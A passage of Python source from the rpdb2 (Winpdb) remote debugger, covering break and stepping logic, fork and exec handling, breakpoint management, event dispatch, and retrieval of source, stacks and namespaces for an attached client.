if self.m_fBreak:
return True
if ctx.m_fUnhandledException:
return True
if self.m_step_tid == ctx.m_thread_id:
return True
if self.m_next_frame == frame:
return True
if (self.m_return_frame == frame) and (event == 'return'):
return True
return False
def record_client_heartbeat(self, id, finit, fdetach):
"""
Record that client id is still attached.
"""
if finit:
self.m_heartbeats.pop(0, None)
if fdetach:
self.m_heartbeats.pop(id, None)
return
if finit or id in self.m_heartbeats:
self.m_heartbeats[id] = time.time()
def fix_heartbeats(self, missing_pulse):
for k, v in list(self.m_heartbeats.items()):
self.m_heartbeats[k] = v + missing_pulse
def get_clients_attached(self):
n = 0
t = time.time()
for v in list(self.m_heartbeats.values()):
if t < v + HEARTBEAT_TIMEOUT:
n += 1
return n
def is_waiting_for_attach(self):
if self.get_clients_attached() != 1:
return False
if list(self.m_heartbeats.keys()) != [0]:
return False
return True
def _break(self, ctx, frame, event, arg):
"""
Main break logic.
"""
global g_fos_exit
global g_module_main
if not self.is_break(ctx, frame, event) and not ctx.is_breakpoint():
ctx.set_tracers()
return
ctx.m_fBroken = True
f_full_notification = False
f_uhe_notification = False
step_tid = self.m_step_tid
try:
self.m_state_manager.acquire()
if self.m_state_manager.get_state() != STATE_BROKEN:
self.set_break_dont_lock()
if g_module_main == -1:
try:
g_module_main = sys.modules['__main__']
except:
g_module_main = None
if not is_py3k() and not frame.f_exc_traceback is None:
ctx.set_exc_info((frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback))
if is_py3k() and ctx.get_exc_info() == None and sys.exc_info()[2] != None:
ctx.set_exc_info(sys.exc_info())
try:
t = current_thread()
ctx.m_thread_name = thread_get_name(t)
except:
pass
if ctx.m_fUnhandledException and not self.m_fUnhandledException:
self.m_fUnhandledException = True
f_uhe_notification = True
if self.is_auto_fork_first_stage(ctx.m_thread_id):
self.m_saved_step = (self.m_step_tid, self.m_saved_next, self.m_return_frame)
self.m_saved_next = None
self.m_bp_manager.m_fhard_tbp = True
if self.m_f_first_to_break or (self.m_current_ctx == ctx):
self.m_current_ctx = ctx
self.m_lastest_event = event
self.m_step_tid = None
self.m_next_frame = None
self.m_return_frame = None
self.m_saved_next = None
self.m_bp_manager.del_temp_breakpoint(breakpoint = ctx.get_breakpoint())
self.m_f_first_to_break = False
f_full_notification = True
finally:
self.m_state_manager.release()
ffork_second_stage = self.handle_fork(ctx)
self.handle_exec(ctx)
if self.is_auto_fork_first_stage(ctx.m_thread_id):
self.request_go_quiet()
elif self.m_ffork_auto and ffork_second_stage:
(self.m_step_tid, self.m_next_frame, self.m_return_frame) = self.m_saved_step
self.m_saved_step = (None, None, None)
self.m_bp_manager.m_fhard_tbp = False
self.request_go_quiet()
elif self.get_clients_attached() == 0:
#print_debug('state: %s' % self.m_state_manager.get_state())
self.request_go_quiet()
elif step_tid == ctx.m_thread_id and frame.f_code.co_name == 'rpdb2_import_wrapper':
self.request_step_quiet()
else:
if f_full_notification:
self.send_events(None)
else:
self.notify_thread_broken(ctx.m_thread_id, ctx.m_thread_name)
self.notify_namespace()
if f_uhe_notification:
self.send_unhandled_exception_event()
state = self.m_state_manager.wait_for_state([STATE_RUNNING])
self.prepare_fork_step(ctx.m_thread_id)
self.prepare_exec_step(ctx.m_thread_id)
ctx.m_fUnhandledException = False
ctx.m_fBroken = False
ctx.set_tracers()
ctx.reset_exc_info()
if g_fos_exit:
g_fos_exit = False
self.send_event_exit()
time.sleep(1.0)
self.stoptrace()
def is_auto_fork_first_stage(self, tid):
if not self.m_ffork_auto:
return False
return tid == g_forktid and g_forkpid == None
def prepare_fork_step(self, tid):
global g_forkpid
global g_ignore_broken_pipe
if tid != g_forktid:
return
self.m_step_tid = tid
g_forkpid = os.getpid()
if not self.m_ffork_into_child:
return
n = self.get_clients_attached()
self.send_fork_switch(n)
time.sleep(0.5)
g_server.shutdown()
CThread.joinAll()
g_ignore_broken_pipe = time.time()
def handle_fork(self, ctx):
global g_forktid
global g_forkpid
tid = ctx.m_thread_id
if g_forkpid == None or tid != g_forktid:
return False
forkpid = g_forkpid
g_forkpid = None
g_forktid = None
if os.getpid() == forkpid:
#
# Parent side of fork().
#
if not self.m_ffork_into_child:
#CThread.clearJoin()
#g_server.jumpstart()
return True
self.stoptrace()
return False
#
# Child side of fork().
#
if not self.m_ffork_into_child:
self.stoptrace()
return False
self.m_threads = {tid: ctx}
CThread.clearJoin()
g_server.jumpstart()
return True
def prepare_exec_step(self, tid):
global g_execpid
if tid != g_exectid:
return
self.m_step_tid = tid
g_execpid = os.getpid()
n = self.get_clients_attached()
self.send_exec_switch(n)
time.sleep(0.5)
g_server.shutdown()
CThread.joinAll()
def handle_exec(self, ctx):
global g_exectid
global g_execpid
tid = ctx.m_thread_id
if g_execpid == None or tid != g_exectid:
return False
g_execpid = None
g_exectid = None
#
# If we are here it means that the exec failed.
# Jumpstart the debugger to allow debugging to continue.
#
CThread.clearJoin()
g_server.jumpstart()
return True
def notify_thread_broken(self, tid, name):
"""
Notify that thread (tid) has broken.
This notification is sent for each thread that breaks after
the first one.
"""
_event = CEventThreadBroken(tid, name)
self.m_event_dispatcher.fire_event(_event)
def notify_namespace(self):
"""
Notify that a namespace update query should be done.
"""
_event = CEventNamespace()
self.m_event_dispatcher.fire_event(_event)
def get_state(self):
return self.m_state_manager.get_state()
def verify_broken(self):
if self.m_state_manager.get_state() != STATE_BROKEN:
raise DebuggerNotBroken
def get_current_filename(self, frame_index, fException):
"""
Return path of sources corresponding to the frame at depth
'frame_index' down the stack of the current thread.
"""
ctx = self.get_current_ctx()
try:
f = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
frame_filename = calc_frame_path(f)
return frame_filename
finally:
f = None
base_frame = None
ctx.frame_release()
def get_threads(self):
return self.m_threads
def set_break_dont_lock(self):
self.m_f_first_to_break = True
self.m_state_manager.set_state(STATE_BROKEN, fLock = False)
self.set_break_flag()
self.set_all_tracers()
def request_break(self):
"""
Ask debugger to break (pause debuggee).
"""
if len(self.m_threads) == 0:
self.wait_for_first_thread()
try:
self.m_state_manager.acquire()
if self.m_state_manager.get_state() == STATE_BROKEN:
return
self.set_break_dont_lock()
finally:
self.m_state_manager.release()
self.send_events(None)
def request_go_quiet(self, fLock = True):
try:
self.request_go(fLock)
except DebuggerNotBroken:
pass
def request_go(self, fLock = True):
"""
Let debugger run.
"""
try:
if fLock:
self.m_state_manager.acquire()
self.verify_broken()
self.m_fUnhandledException = False
self.m_state_manager.set_state(STATE_RUNNING, fLock = False)
if self.m_fembedded:
time.sleep(0.33)
self.set_break_flag()
finally:
if fLock:
self.m_state_manager.release()
def request_go_breakpoint(self, filename, scope, lineno, frame_index, fException):
"""
Let debugger run until the temporary breakpoint defined by the arguments is hit.
"""
assert(is_unicode(filename))
assert(is_unicode(scope))
try:
self.m_state_manager.acquire()
self.verify_broken()
if filename in [None, '']:
_filename = self.get_current_filename(frame_index, fException)
elif not is_provider_filesystem(filename):
_filename = as_string(filename, sys.getfilesystemencoding())
else:
_filename = FindFile(filename, fModules = True)
self.m_bp_manager.set_temp_breakpoint(_filename, scope, lineno)
self.set_all_tracers()
self.request_go(fLock = False)
finally:
self.m_state_manager.release()
def request_step_quiet(self, fLock = True):
try:
self.request_step(fLock)
except DebuggerNotBroken:
pass
def request_step(self, fLock = True):
"""
Let debugger run until next statement is reached or a breakpoint
is hit in another thread.
"""
try:
if fLock:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
self.m_step_tid = ctx.m_thread_id
self.m_next_frame = None
self.m_return_frame = None
self.request_go(fLock = False)
finally:
if fLock:
self.m_state_manager.release()
def request_next(self):
"""
Let debugger run until next statement in the same frame
is reached or a breakpoint is hit in another thread.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
if self.m_lastest_event in ['return', 'exception']:
return self.request_step(fLock = False)
self.m_next_frame = ctx.m_frame
self.m_return_frame = None
self.request_go(fLock = False)
finally:
self.m_state_manager.release()
def request_return(self):
"""
Let debugger run until the end of the current frame is reached
or a breakpoint is hit in another thread.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
if self.m_lastest_event == 'return':
return self.request_step(fLock = False)
self.m_next_frame = None
self.m_return_frame = ctx.m_frame
self.request_go(fLock = False)
finally:
self.m_state_manager.release()
def request_jump(self, lineno):
"""
Jump to line number 'lineno'.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
frame = ctx.m_frame
code = frame.f_code
valid_lines = CalcValidLines(code)
sbi = CScopeBreakInfo(as_unicode(''), valid_lines)
l = sbi.CalcScopeLine(lineno)
frame.f_lineno = l
finally:
frame = None
self.m_state_manager.release()
self.send_events(None)
def set_thread(self, tid):
"""
Switch focus to specified thread.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
if (tid >= 0) and (tid < 100):
_tid = list(self.m_threads.keys())[tid]
else:
_tid = tid
ctx = self.m_threads[_tid]
except (IndexError, KeyError):
raise ThreadNotFound
self.m_current_ctx = ctx
self.m_lastest_event = ctx.m_event
finally:
self.m_state_manager.release()
self.send_events(None)
class CDebuggerEngine(CDebuggerCore):
"""
Main class for the debugger.
Adds functionality on top of CDebuggerCore.
"""
def __init__(self, fembedded = False):
CDebuggerCore.__init__(self, fembedded)
event_type_dict = {
CEventState: {},
CEventStackDepth: {},
CEventBreakpoint: {},
CEventThreads: {},
CEventNoThreads: {},
CEventThreadBroken: {},
CEventNamespace: {},
CEventUnhandledException: {},
CEventStack: {},
CEventNull: {},
CEventExit: {},
CEventForkSwitch: {},
CEventExecSwitch: {},
CEventSynchronicity: {},
CEventTrap: {},
CEventForkMode: {},
CEventPsycoWarning: {},
CEventConflictingModules: {},
CEventSignalIntercepted: {},
CEventSignalException: {},
CEventClearSourceCache: {},
CEventEmbeddedSync: {}
}
self.m_event_queue = CEventQueue(self.m_event_dispatcher)
self.m_event_queue.register_event_types(event_type_dict)
event_type_dict = {CEventSync: {}}
self.m_event_dispatcher.register_callback(self.send_events, event_type_dict, fSingleUse = False)
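#
# Note: the event types registered above are queued in m_event_queue for
# delivery to clients via wait_for_event(), while CEventSync is routed
# straight to send_events() so that a sync request replays the full
# debugger state.
#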
def shutdown(self):
self.m_event_queue.shutdown()
CDebuggerCore.shutdown(self)
def sync_with_events(self, fException, fSendUnhandled):
"""
Send debugger state to client.
"""
if len(self.m_threads) == 0:
self.wait_for_first_thread()
index = self.m_event_queue.get_event_index()
event = CEventSync(fException, fSendUnhandled)
self.m_event_dispatcher.fire_event(event)
return index
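#
# The event index is sampled before CEventSync is fired, so a client that
# later calls wait_for_event() with the returned index should also receive
# the state events generated by this sync.
#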
def trap_conflicting_modules(self):
modules_list = []
for m in CONFLICTING_MODULES:
if m in g_found_conflicting_modules:
continue
if not m in sys.modules:
continue
if m == 'psyco':
#
# Old event kept for compatibility.
#
event = CEventPsycoWarning()
self.m_event_dispatcher.fire_event(event)
g_found_conflicting_modules.append(m)
modules_list.append(as_unicode(m))
if modules_list == []:
return False
event = CEventConflictingModules(modules_list)
self.m_event_dispatcher.fire_event(event)
return True
def wait_for_event(self, timeout, event_index):
"""
Wait for new events and return them as a list of events.
"""
self.cancel_request_go_timer()
self.trap_conflicting_modules()
(new_event_index, sel) = self.m_event_queue.wait_for_event(timeout, event_index)
if self.trap_conflicting_modules():
(new_event_index, sel) = self.m_event_queue.wait_for_event(timeout, event_index)
return (new_event_index, sel)
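#
# trap_conflicting_modules() is checked both before and after the wait:
# if a conflicting module was imported while this call was blocked, the
# wait is repeated (with the original event_index) so the newly fired
# warning event is included in the result.
#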
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding):
print_debug('Setting breakpoint to: %s, %s, %d' % (repr(filename), scope, lineno))
assert(is_unicode(filename))
assert(is_unicode(scope))
assert(is_unicode(expr))
fLock = False
try:
if filename in [None, '']:
self.m_state_manager.acquire()
fLock = True
self.verify_broken()
_filename = self.get_current_filename(frame_index, fException)
elif not is_provider_filesystem(filename):
_filename = as_string(filename, sys.getfilesystemencoding())
else:
_filename = FindFile(filename, fModules = True)
if expr != '':
try:
encoding = self.__calc_encoding(encoding, filename = _filename)
_expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding)
compile(_expr, '<string>', 'eval')
except:
raise SyntaxError
encoding = as_unicode(encoding)
bp = self.m_bp_manager.set_breakpoint(_filename, scope, lineno, fEnabled, expr, encoding)
self.set_all_tracers()
event = CEventBreakpoint(bp)
#print_debug(repr(vars(bp)))
self.m_event_dispatcher.fire_event(event)
finally:
if fLock:
self.m_state_manager.release()
def disable_breakpoint(self, id_list, fAll):
self.m_bp_manager.disable_breakpoint(id_list, fAll)
self.set_all_tracers()
event = CEventBreakpoint(None, CEventBreakpoint.DISABLE, id_list, fAll)
self.m_event_dispatcher.fire_event(event)
def enable_breakpoint(self, id_list, fAll):
self.m_bp_manager.enable_breakpoint(id_list, fAll)
self.set_all_tracers()
event = CEventBreakpoint(None, CEventBreakpoint.ENABLE, id_list, fAll)
self.m_event_dispatcher.fire_event(event)
def delete_breakpoint(self, id_list, fAll):
self.m_bp_manager.delete_breakpoint(id_list, fAll)
self.set_all_tracers()
event = CEventBreakpoint(None, CEventBreakpoint.REMOVE, id_list, fAll)
self.m_event_dispatcher.fire_event(event)
def get_breakpoints(self):
"""
Return the id -> breakpoint dictionary.
"""
bpl = self.m_bp_manager.get_breakpoints()
_items = [(id, breakpoint_copy(bp)) for (id, bp) in bpl.items()]
for (id, bp) in _items:
bp.m_code = None
_bpl = dict(_items)
return _bpl
def send_events(self, event):
"""
Send series of events that define the debugger state.
"""
if isinstance(event, CEventSync):
fException = event.m_fException
fSendUnhandled = event.m_fSendUnhandled
else:
fException = False
fSendUnhandled = False
try:
if isinstance(event, CEventSync) and not fException:
self.m_state_manager.set_state()
self.send_stack_depth()
self.send_threads_event(fException)
self.send_stack_event(fException)
self.send_namespace_event()
if fSendUnhandled and self.m_fUnhandledException:
self.send_unhandled_exception_event()
except NoThreads:
self.send_no_threads_event()
except:
print_debug_exception()
raise
def send_unhandled_exception_event(self):
event = CEventUnhandledException()
self.m_event_dispatcher.fire_event(event)
def send_stack_depth(self):
"""
Send event with stack depth and exception stack depth.
"""
f = None
tb = None
ctx = self.get_current_ctx()
try:
try:
f = ctx.frame_acquire()
except ThreadDone:
return
s = my_extract_stack(f)
s = [1 for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
stack_depth = len(s)
tb = get_traceback(f, ctx)
if tb == None:
stack_depth_exception = None
else:
s = my_extract_stack(tb.tb_frame.f_back)
s += my_extract_tb(tb)
s = [1 for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
stack_depth_exception = len(s)
event = CEventStackDepth(stack_depth, stack_depth_exception)
self.m_event_dispatcher.fire_event(event)
finally:
f = None
tb = None
ctx.frame_release()
def send_threads_event(self, fException):
"""
Send event with current thread list.
In case of exception, send only the current thread.
"""
tl = self.get_thread_list()
if fException:
ctid = tl[0]
itl = tl[1]
_itl = [a for a in itl if a[DICT_KEY_TID] == ctid]
_tl = (ctid, _itl)
else:
_tl = tl
event = CEventThreads(*_tl)
self.m_event_dispatcher.fire_event(event)
def send_stack_event(self, fException):
sl = self.get_stack([], False, fException)
if len(sl) == 0:
return
event = CEventStack(sl[0])
self.m_event_dispatcher.fire_event(event)
def send_namespace_event(self):
"""
Send event notifying namespace should be queried again.
"""
event = CEventNamespace()
self.m_event_dispatcher.fire_event(event)
def send_no_threads_event(self):
_event = CEventNoThreads()
self.m_event_dispatcher.fire_event(_event)
def send_event_null(self):
"""
Make the event waiter return.
"""
event = CEventNull()
self.m_event_dispatcher.fire_event(event)
def __get_stack(self, ctx, ctid, fException):
tid = ctx.m_thread_id
f = None
_f = None
tb = None
_tb = None
try:
try:
f = ctx.frame_acquire()
except ThreadDone:
return None
if fException:
tb = get_traceback(f, ctx)
if tb == None:
raise NoExceptionFound
_tb = tb
while _tb.tb_next is not None:
_tb = _tb.tb_next
_f = _tb.tb_frame
s = my_extract_stack(tb.tb_frame.f_back)
s += my_extract_tb(tb)
else:
_f = f
s = my_extract_stack(f)
code_list = []
while _f is not None:
rc = repr(_f.f_code).split(',')[0].split()[-1]
rc = as_unicode(rc)
code_list.insert(0, rc)
_f = _f.f_back
finally:
f = None
_f = None
tb = None
_tb = None
ctx.frame_release()
#print code_list
__s = [(a, b, c, d) for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
if (ctx.m_uef_lineno is not None) and (len(__s) > 0):
(a, b, c, d) = __s[0]
__s = [(a, ctx.m_uef_lineno, c, d)] + __s[1:]
r = {}
r[DICT_KEY_STACK] = __s
r[DICT_KEY_CODE_LIST] = code_list
r[DICT_KEY_TID] = tid
r[DICT_KEY_BROKEN] = ctx.m_fBroken
r[DICT_KEY_EVENT] = as_unicode([ctx.m_event, 'exception'][fException])
if tid == ctid:
r[DICT_KEY_CURRENT_TID] = True
return r
def get_stack(self, tid_list, fAll, fException):
if fException and (fAll or (len(tid_list) != 0)):
raise BadArgument
ctx = self.get_current_ctx()
ctid = ctx.m_thread_id
if fAll:
ctx_list = list(self.get_threads().values())
elif fException or (len(tid_list) == 0):
ctx_list = [ctx]
else:
ctx_list = [self.get_threads().get(t, None) for t in tid_list]
_sl = [self.__get_stack(ctx, ctid, fException) for ctx in ctx_list if ctx is not None]
sl = [s for s in _sl if s is not None]
return sl
def get_source_file(self, filename, lineno, nlines, frame_index, fException):
assert(is_unicode(filename))
if lineno < 1:
lineno = 1
nlines = -1
_lineno = lineno
r = {}
frame_filename = None
try:
ctx = self.get_current_ctx()
try:
f = None
base_frame = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
frame_filename = calc_frame_path(f)
finally:
f = None
base_frame = None
ctx.frame_release()
frame_event = [[ctx.m_event, 'call'][frame_index > 0], 'exception'][fException]
except NoThreads:
if filename in [None, '']:
raise
if filename in [None, '']:
__filename = frame_filename
r[DICT_KEY_TID] = ctx.m_thread_id
elif not is_provider_filesystem(filename):
__filename = as_string(filename, sys.getfilesystemencoding())
else:
__filename = FindFile(filename, fModules = True)
if not IsPythonSourceFile(__filename):
raise NotPythonSource
_filename = winlower(__filename)
lines = []
breakpoints = {}
fhide_pwd_mode = False
while nlines != 0:
try:
g_traceback_lock.acquire()
line = get_source_line(_filename, _lineno)
finally:
g_traceback_lock.release()
if line == '':
break
#
# Remove any trace of session password from data structures that
# go over the network.
#
if fhide_pwd_mode:
if not ')' in line:
line = as_unicode('...\n')
else:
line = '...""")' + line.split(')', 1)[1]
fhide_pwd_mode = False
elif 'start_embedded_debugger(' in line:
ls = line.split('start_embedded_debugger(', 1)
line = ls[0] + 'start_embedded_debugger("""...Removed-password-from-output...'
if ')' in ls[1]:
line += '""")' + ls[1].split(')', 1)[1]
else:
line += '\n'
fhide_pwd_mode = True
lines.append(line)
try:
bp = self.m_bp_manager.get_breakpoint(_filename, _lineno)
breakpoints[_lineno] = as_unicode([STATE_DISABLED, STATE_ENABLED][bp.isEnabled()])
except KeyError:
pass
_lineno += 1
nlines -= 1
if frame_filename == _filename:
r[DICT_KEY_FRAME_LINENO] = frame_lineno
r[DICT_KEY_EVENT] = as_unicode(frame_event)
r[DICT_KEY_BROKEN] = ctx.m_fBroken
r[DICT_KEY_LINES] = lines
r[DICT_KEY_FILENAME] = as_unicode(_filename, sys.getfilesystemencoding())
r[DICT_KEY_BREAKPOINTS] = breakpoints
r[DICT_KEY_FIRST_LINENO] = lineno
return r
def __get_source(self, ctx, nlines, frame_index, fException):
tid = ctx.m_thread_id
_frame_index = [0, frame_index][tid == self.m_current_ctx.m_thread_id]
try:
try:
f = None
base_frame = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, _frame_index, fException)
frame_filename = calc_frame_path(f)
except (ThreadDone, InvalidFrame):
return None
finally:
f = None
base_frame = None
ctx.frame_release()
frame_event = [[ctx.m_event, 'call'][frame_index > 0], 'exception'][fException]
first_line = max(1, frame_lineno - nlines // 2)
_lineno = first_line
lines = []
breakpoints = {}
fhide_pwd_mode = False
while nlines != 0:
try:
g_traceback_lock.acquire()
line = get_source_line(frame_filename, _lineno)
finally:
g_traceback_lock.release()
if line == '':
break
#
# Remove any trace of session password from data structures that
# go over the network.
#
if fhide_pwd_mode:
if not ')' in line:
line = as_unicode('...\n')
else:
line = '...""")' + line.split(')', 1)[1]
fhide_pwd_mode = False
elif 'start_embedded_debugger(' in line:
ls = line.split('start_embedded_debugger(', 1)
line = ls[0] + 'start_embedded_debugger("""...Removed-password-from-output...'
if ')' in ls[1]:
line += '""")' + ls[1].split(')', 1)[1]
else:
line += '\n'
fhide_pwd_mode = True
lines.append(line)
try:
bp = self.m_bp_manager.get_breakpoint(frame_filename, _lineno)
breakpoints[_lineno] = as_unicode([STATE_DISABLED, STATE_ENABLED][bp.isEnabled()])
except KeyError:
pass
_lineno += 1
nlines -= 1
r = {}
r[DICT_KEY_FRAME_LINENO] = frame_lineno
r[DICT_KEY_EVENT] = as_unicode(frame_event)
r[DICT_KEY_BROKEN] = ctx.m_fBroken
r[DICT_KEY_TID] = tid
r[DICT_KEY_LINES] = lines
r[DICT_KEY_FILENAME] = as_unicode(frame_filename, sys.getfilesystemencoding())
r[DICT_KEY_BREAKPOINTS] = breakpoints
r[DICT_KEY_FIRST_LINENO] = first_line
return r
def get_source_lines(self, nlines, fAll, frame_index, fException):
if fException and fAll:
raise BadArgument
if fAll:
ctx_list = list(self.get_threads().values())
else:
ctx = self.get_current_ctx()
ctx_list = [ctx]
_sl = [self.__get_source(ctx, nlines, frame_index, fException) for ctx in ctx_list]
sl = [s for s in _sl if s is not None]
return sl
def __get_locals_globals(self, frame_index, fException, fReadOnly = False):
ctx = self.get_current_ctx()
(_globals, _locals, _original_locals_copy) = ctx.get_locals_copy(frame_index, fException, fReadOnly)
return (_globals, _locals, _original_locals_copy)
def __calc_number_of_subnodes(self, r):
for t in [bytearray, bytes, str, str8, unicode, int, long, float, bool, type(None)]:
if t is type(r):
return 0
try:
try:
if isinstance(r, frozenset) or isinstance(r, set):
return len(r)
except NameError:
pass
if isinstance(r, sets.BaseSet):
return len(r)
if isinstance(r, dict):
return len(r)
if isinstance(r, list):
return len(r)
if isinstance(r, tuple):
return len(r)
return len(dir(r))
except AttributeError:
return 0
return 0
def __calc_subnodes(self, expr, r, fForceNames, filter_level, repr_limit, encoding):
snl = []
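#
# Each subnode entry carries, besides its repr, a DICT_KEY_EXPR string: a
# Python expression the client can send back to drill further into this
# child. Keys that cannot be reproduced from a short repr are routed
# through _RPDB2_FindRepr (defined elsewhere in this module), with embedded
# double quotes replaced (see the .replace() calls below) so the generated
# ["..."] lookup stays parseable.
#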
try:
if isinstance(r, frozenset) or isinstance(r, set):
if len(r) > MAX_SORTABLE_LENGTH:
g = r
else:
g = [i for i in r]
sort(g)
for i in g:
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
rk = repr_ltd(i, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)
e = {}
e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '&quot')))
e[DICT_KEY_NAME] = repr_ltd(i, repr_limit, encoding)
e[DICT_KEY_REPR] = repr_ltd(i, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(i)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(i)
snl.append(e)
return snl
except NameError:
pass
if isinstance(r, sets.BaseSet):
if len(r) > MAX_SORTABLE_LENGTH:
g = r
else:
g = [i for i in r]
sort(g)
for i in g:
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
rk = repr_ltd(i, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)
e = {}
e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '&quot')))
e[DICT_KEY_NAME] = repr_ltd(i, repr_limit, encoding)
e[DICT_KEY_REPR] = repr_ltd(i, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(i)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(i)
snl.append(e)
return snl
if isinstance(r, list) or isinstance(r, tuple):
for i, v in enumerate(r[0: MAX_NAMESPACE_ITEMS]):
is_valid = [True]
e = {}
e[DICT_KEY_EXPR] = as_unicode('(%s)[%d]' % (expr, i))
e[DICT_KEY_NAME] = as_unicode(repr(i))
e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)
snl.append(e)
if len(r) > MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
return snl
if isinstance(r, dict):
if filter_level == 2 and expr in ['locals()', 'globals()']:
r = copy.copy(r)
for k, v in list(r.items()):
if parse_type(type(v)) in ['function', 'classobj', 'type']:
del r[k]
if len(r) > MAX_SORTABLE_LENGTH:
kl = r
else:
kl = list(r.keys())
sort(kl)
for k in kl:
#
# Remove any trace of session password from data structures that
# go over the network.
#
if k in ['_RPDB2_FindRepr', '_RPDB2_builtins', '_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
continue
v = r[k]
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
e = {}
if [True for t in [bool, int, float, bytes, str, unicode, type(None)] if t is type(k)]:
rk = repr(k)
if len(rk) < REPR_ID_LENGTH:
e[DICT_KEY_EXPR] = as_unicode('(%s)[%s]' % (expr, rk))
if type(k) is str8:
rk = repr(k)
if len(rk) < REPR_ID_LENGTH:
e[DICT_KEY_EXPR] = as_unicode('(%s)[str8(%s)]' % (expr, rk[1:]))
if not DICT_KEY_EXPR in e:
rk = repr_ltd(k, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)
e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '&quot')))
e[DICT_KEY_NAME] = as_unicode([repr_ltd(k, repr_limit, encoding), k][fForceNames])
e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)
snl.append(e)
return snl
al = calc_attribute_list(r, filter_level)
sort(al)
for a in al:
if a == 'm_rpdb2_pwd':
continue
try:
v = getattr(r, a)
except AttributeError:
continue
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
e = {}
e[DICT_KEY_EXPR] = as_unicode('(%s).%s' % (expr, a))
e[DICT_KEY_NAME] = as_unicode(a)
e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)
snl.append(e)
return snl
def get_exception(self, frame_index, fException):
ctx = self.get_current_ctx()
if is_py3k():
exc_info = ctx.get_exc_info()
if exc_info == None:
return {'type': None, 'value': None, 'traceback': None}
type, value, traceback = exc_info
e = {'type': type, 'value': value, 'traceback': traceback}
return e
try:
f = None
base_frame = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
e = {'type': f.f_exc_type, 'value': f.f_exc_value, 'traceback': f.f_exc_traceback}
return e
finally:
f = None
base_frame = None
ctx.frame_release()
def is_child_of_failure(self, failed_expr_list, expr):
for failed_expr in failed_expr_list:
if expr.startswith(failed_expr):
return True
return False
def calc_expr(self, expr, fExpand, filter_level, frame_index, fException, _globals, _locals, lock, event, rl, index, repr_limit, encoding):
e = {}
try:
__globals = _globals
__locals = _locals
if RPDB_EXEC_INFO in expr:
rpdb_exception_info = self.get_exception(frame_index, fException)
__globals = globals()
__locals = locals()
__locals['_RPDB2_FindRepr'] = _RPDB2_FindRepr
is_valid = [True]
r = eval(expr, __globals, __locals)
e[DICT_KEY_EXPR] = as_unicode(expr)
e[DICT_KEY_REPR] = repr_ltd(r, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(r)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(r)
if fExpand and (e[DICT_KEY_N_SUBNODES] > 0):
fForceNames = (expr in ['globals()', 'locals()']) or (RPDB_EXEC_INFO in expr)
e[DICT_KEY_SUBNODES] = self.__calc_subnodes(expr, r, fForceNames, filter_level, repr_limit, encoding)
e[DICT_KEY_N_SUBNODES] = len(e[DICT_KEY_SUBNODES])
except:
print_debug_exception()
e[DICT_KEY_ERROR] = as_unicode(safe_repr(sys.exc_info()))
lock.acquire()
if len(rl) == index:
rl.append(e)
lock.release()
event.set()
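#
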